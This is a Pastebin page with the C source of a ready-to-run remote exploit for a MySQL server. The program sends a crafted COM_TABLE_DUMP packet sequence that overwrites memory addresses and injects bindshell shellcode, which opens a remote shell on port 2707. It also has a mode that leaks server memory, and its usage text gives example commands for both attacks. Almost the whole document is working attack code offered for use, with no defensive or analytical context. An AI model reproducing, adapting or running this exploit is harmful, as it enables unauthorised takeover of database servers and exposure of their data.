Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <mysql.h>
- #include <unistd.h>
- // we need to know the thread struct address pointer and the table_list.
- // these are defaults, change them from command line.
- int thd = 0x8b1b338;
- int tbl = 0x8b3a880;
- #define USOCK2 "/tmp/mysql.sock"
- char addr_tdh[4];
- char addr_tbl[4];
- char addr_ret[4];
- // constants to overwrite packet with addresses for table_list thread and our shell.
- #define TBL_POS 182
- #define THD_POS 178
- #define RET_POS 174
- #define SHL_POS 34
- // bindshell spawns a shell with on port 2707
- char shcode[] = {
- 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12
- ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1
- ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80
- ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0
- ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80
- ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f
- ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84
- };
- int tmp_idx = 0;
- int dump_packet_len = 7;
- char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };
- int payload_len = 371;
- // header packet + select '1234567890...etc'
- char query_payload[] = {
- 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ...
- , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32
- , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48
- , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64
- , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72
- , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88
- , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94
- , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112
- , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118
- , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144
- , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160
- , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176
- , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178
- , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
- , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d //
- , 0x3d, 0x3d, 0x27
- }; // 16*23+3 = 371
- static int s = 0, c = 0;
- int fd = 0;
- int d = 1;
- int hexdump = 0;
- char buf[65535];
- MYSQL *conn; /* pointer to connection handler */
- int
- sendit (char *buf1, int fdest, int dblen)
- {
- int len1;
- int i = 0;
- int ret = 0;
- printf ("%d\n", d);
- if (d == 2)
- {
- // let's prepare the query packet
- int o;
- int position = 14;
- tmp_idx = 3;
- int ret = tbl - 0x106 + 33;
- for (i = 0; i < 32; i += 8)
- addr_ret[tmp_idx--] = (ret >> i) & 0xff;
- tmp_idx = 3;
- for (i = 0; i < 32; i += 8)
- addr_tdh[tmp_idx--] = (thd >> i) & 0xff;
- tmp_idx = 3;
- for (i = 0; i < 32; i += 8)
- addr_tbl[tmp_idx--] = (tbl >> i) & 0xff;
- printf ("ret %x\n", ret);
- #if 1
- tmp_idx = 0;
- for (o = THD_POS; o > THD_POS - 4; o--)
- query_payload[o] = addr_tdh[tmp_idx++];
- tmp_idx = 0;
- for (o = TBL_POS; o > TBL_POS - 4; o--)
- query_payload[o] = addr_tbl[tmp_idx++];
- tmp_idx = 0;
- for (o = RET_POS; o > RET_POS - 4; o--)
- query_payload[o] = addr_ret[tmp_idx++];
- #else
- for (; position < payload_len - 12; position += 12)
- {
- tmp_idx = 0;
- printf ("p:%d\n", position);
- for (o = position + 4; o > position; o--)
- query_payload[o] = addr_ret[tmp_idx++];
- tmp_idx = 0;
- for (o = position + 8; o > position + 4; o--)
- query_payload[o] = addr_tdh[tmp_idx++];
- tmp_idx = 0;
- for (o = position + 12; o > position + 8; o--)
- query_payload[o] = addr_tbl[tmp_idx++];
- }
- #endif
- tmp_idx = 0;
- for (o = SHL_POS; o < SHL_POS + 84; o++)
- query_payload[o] = shcode[tmp_idx++];
- printf ("entro\n");
- buf1 = query_payload;
- len1 = payload_len;
- }
- else if (d >= 3)
- {
- printf ("entro\n");
- // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)
- buf1 = table_dump_packet;
- if (dblen >= 0)
- buf1[5] = (char) dblen;
- printf ("%x", (char) dblen);
- len1 = dump_packet_len;
- }
- d++;
- printf ("\nClient -> Server\n");
- if (hexdump)
- {
- for (i = 0; i < len1; i++)
- printf (" %.2x%c", (unsigned char) buf1[i],
- ((i + 1) % 16 ? ' ' : '\n'));
- printf ("\n");
- for (i = 0; i < len1; i++)
- {
- unsigned char f = (unsigned char) buf1[i];
- printf (" %.2c%2c", (isprint (f) ? f : '.'),
- (((i + 1) % 16) ? ' ' : '\n'));
- }
- }
- if (send (fd, buf1, len1, 0) != len1)
- {
- perror ("cli: send(buf3)");
- exit (1);
- }
- fdest = fd;
- memset (buf, 0, 65535);
- ret = recv (fdest, buf, 65535, 0);
- printf ("\nServer -> Client\n");
- if (hexdump)
- {
- for (i = 0; i < ret; i++)
- printf (" %.2x%c", (unsigned char) buf[i],
- ((i + 1) % 16 ? ' ' : '\n'));
- printf ("\n");
- for (i = 0; i < ret; i++)
- {
- unsigned char f = (unsigned char) buf[i];
- printf (" %.2c%2c", (isprint (f) ? f : '.'),
- ((i + 1) % 16 ? ' ' : '\n'));
- }
- }
- else
- {
- printf ("\n%s\n", buf + 5);
- }
- // printf("\nSending to client\n");
- // ret= send(c, buf, ret, 0);
- return 0;
- }
- usage ()
- {
- printf
- ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\
- -H: this Help;\n\
- -i: Information leak exploit (shows the content of MySql Server Memory)\n\
- -x: shows c/s communication output in hexadecimal\n\
- -t: hexadecimal table_list struct address (by default we try to find it automatically)\n\
- -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\
- -u: mysql username (anonymous too ;)\n\
- -p: mysql userpass (if you need it)\n\
- -s: the socket path if is a unix socket\n\
- -h: hostname or IP address\n\
- -P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\
- Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\
- ");
- }
- int
- main (int argc, char *argv[])
- {
- int fdest = 0;
- int port = 3306;
- int shell = 1;
- int force_table = 0;
- char buf1[65535];
- char *socket;
- char *user = NULL;
- char *pass = NULL;
- char *host = NULL;
- socket = strdup ("/tmp/mysql2.sock");
- opterr = 0;
- while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1)
- switch (c)
- {
- case 's':
- socket = (char *) optarg;
- break;
- case 't':
- force_table = 1;
- tbl = (int) strtol (optarg, NULL, 16);
- //tbl=atoi( optarg );
- break;
- case 'a':
- thd = (int) strtol (optarg, NULL, 16);
- break;
- case 'u':
- user = (char *) optarg;
- break;
- case 'p':
- pass = (char *) optarg;
- break;
- case 'P':
- port = atoi (optarg);
- break;
- case 'h':
- host = (char *) optarg;
- break;
- case 'i':
- shell = 0;
- break;
- case 'x':
- hexdump = 1;
- break;
- case 'H':
- usage ();
- return 1;
- default:
- break;
- }
- if (!force_table)
- tbl = thd + 0x1f548;
- conn = mysql_init (NULL);
- int ret = mysql_real_connect (conn, /* pointer to connection handler */
- host, /* host to connect to */
- user, /* user name */
- pass, /* password */
- NULL, /* database to use */
- 0, /* port (use default) */
- socket, /* socket (use default) */
- 0); /* flags (none) */
- if (!ret)
- {
- fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn));
- return 1;
- }
- printf ("using table_list:%x thread:%x\n", tbl, thd);
- fd = conn->net.fd;
- if (shell)
- {
- d = 2;
- sendit (buf1, fdest, -1);
- d = 3;
- sendit (buf1, fdest, -1);
- d = 3;
- sendit (buf1, fdest, -1);
- }
- else
- {
- int l;
- d = 3;
- for (l = 0; l < 256; l++)
- {
- sendit (buf1, fdest, l);
- }
- }
- mysql_close (conn);
- exit (0);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement